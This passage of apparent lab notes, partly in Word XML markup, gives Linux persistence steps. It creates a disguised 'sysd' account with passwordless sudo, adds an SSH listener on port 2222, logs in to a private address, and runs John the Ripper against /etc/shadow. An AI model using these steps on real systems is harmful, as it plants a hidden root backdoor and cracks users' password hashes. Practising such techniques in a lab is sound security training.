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useradd sysd -s /bin/bash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a password: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passwd sysd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usermod -u 666 sysd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groupmod -g 666 sysd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Go into visudo &amp; add command at the bottom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sysd ALL=(ALL) NOPASSWD:ALL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</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sudo apt update</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sudo visudo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Edit the sshd_config file:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Added Port 2222 underneath Port 22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Port 22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Port 2222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systemctl restart sshd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Exit the root account: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ssh sysd@192.168.6.105 -p 2222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-s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ssh sysd@192.168.6.105 -p 2222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john /etc/shadow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